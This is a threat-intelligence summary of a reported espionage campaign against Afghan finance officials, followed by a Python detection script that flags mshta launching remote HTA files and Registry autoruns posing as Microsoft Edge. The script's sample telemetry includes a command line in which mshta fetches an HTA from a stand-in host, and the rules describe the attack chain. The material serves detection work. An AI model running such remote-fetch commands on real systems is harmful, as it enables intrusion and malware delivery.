Seqrite Labs has documented Operation XENOFISCAL, a campaign by the Pakistan-linked SideCopy group (under the Transparent Tribe / APT36 umbrella) targeting Afghanistan's Ministry of Finance, provincial revenue and finance directorates, and Pashto-speaking government officials. The attack opens with spear-phishing delivering a ZIP archive containing a malicious LNK file bearing a Pashto-language filename - a deliberate choice reflecting familiarity with Afghan government circles. The LNK uses mshta.exe to fetch a remote HTA from a compromised Afghan education domain, running obfuscated in-memory JavaScript. It establishes Registry persistence mimicking Microsoft Edge and drops Xeno RAT 1.8.7 plus a decoy document via a DLL loader. Xeno RAT supports keylogging, screenshots, and SOCKS5 tunneling.
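A detection-side illustration of the chain described above, added here and not taken from the Seqrite report: it flags mshta.exe launched with a remote URL, and autorun values that use an Edge name but point outside Edge's install directories. The event schema, host names, URL, registry key and value names are constructed assumptions; the summary does not name the persistence key.

```python
import re

# Directories where genuine Edge binaries are installed (lower-cased for comparison).
EDGE_ROOTS = tuple(
    f"c:\\{pf}\\microsoft\\{d}\\"
    for pf in ("program files", "program files (x86)")
    for d in ("edge", "edgeupdate")
)
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.I)

def is_mshta_remote(ev):
    """Process-creation event in which mshta.exe is handed a remote URL."""
    image = ev.get("image", "").lower()
    return image.endswith("\\mshta.exe") and bool(URL_RE.search(ev.get("command_line", "")))

def is_fake_edge_autorun(ev):
    """Registry-set event: Run value that looks like Edge but targets a non-Edge path."""
    if "\\currentversion\\run" not in ev.get("key", "").lower():
        return False
    name = ev.get("value_name", "").lower()
    data = ev.get("data", "").lower().strip().lstrip('"')
    if "edge" not in name and "edge" not in data:
        return False
    return not data.startswith(EDGE_ROOTS)

def triage(events):
    """Return (rule, host) pairs for every event that matches a rule."""
    findings = []
    for ev in events:
        if ev["type"] == "process_create" and is_mshta_remote(ev):
            findings.append(("mshta_remote_hta", ev["host"]))
        elif ev["type"] == "registry_set" and is_fake_edge_autorun(ev):
            findings.append(("fake_edge_autorun", ev["host"]))
    return findings

RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"  # assumed location
# Constructed sample telemetry, not data from the report.
SAMPLE_EVENTS = [
    {"type": "process_create", "host": "WS-01", "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://compromised.example/doc.hta"},
    {"type": "process_create", "host": "WS-02", "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"mshta.exe C:\Tools\inventory.hta"},
    {"type": "registry_set", "host": "WS-01", "key": RUN_KEY,
     "value_name": "MicrosoftEdgeUpdate", "data": r"C:\Users\Public\edge\update.exe"},
    {"type": "registry_set", "host": "WS-03", "key": RUN_KEY, "value_name": "EdgeAutoLaunch",
     "data": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window'},
]

if __name__ == "__main__":
    for rule, host in triage(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

Two findings on the same host, as with WS-01 here, are a stronger signal than either rule alone, since local HTA files and genuine Edge autoruns both occur on clean machines.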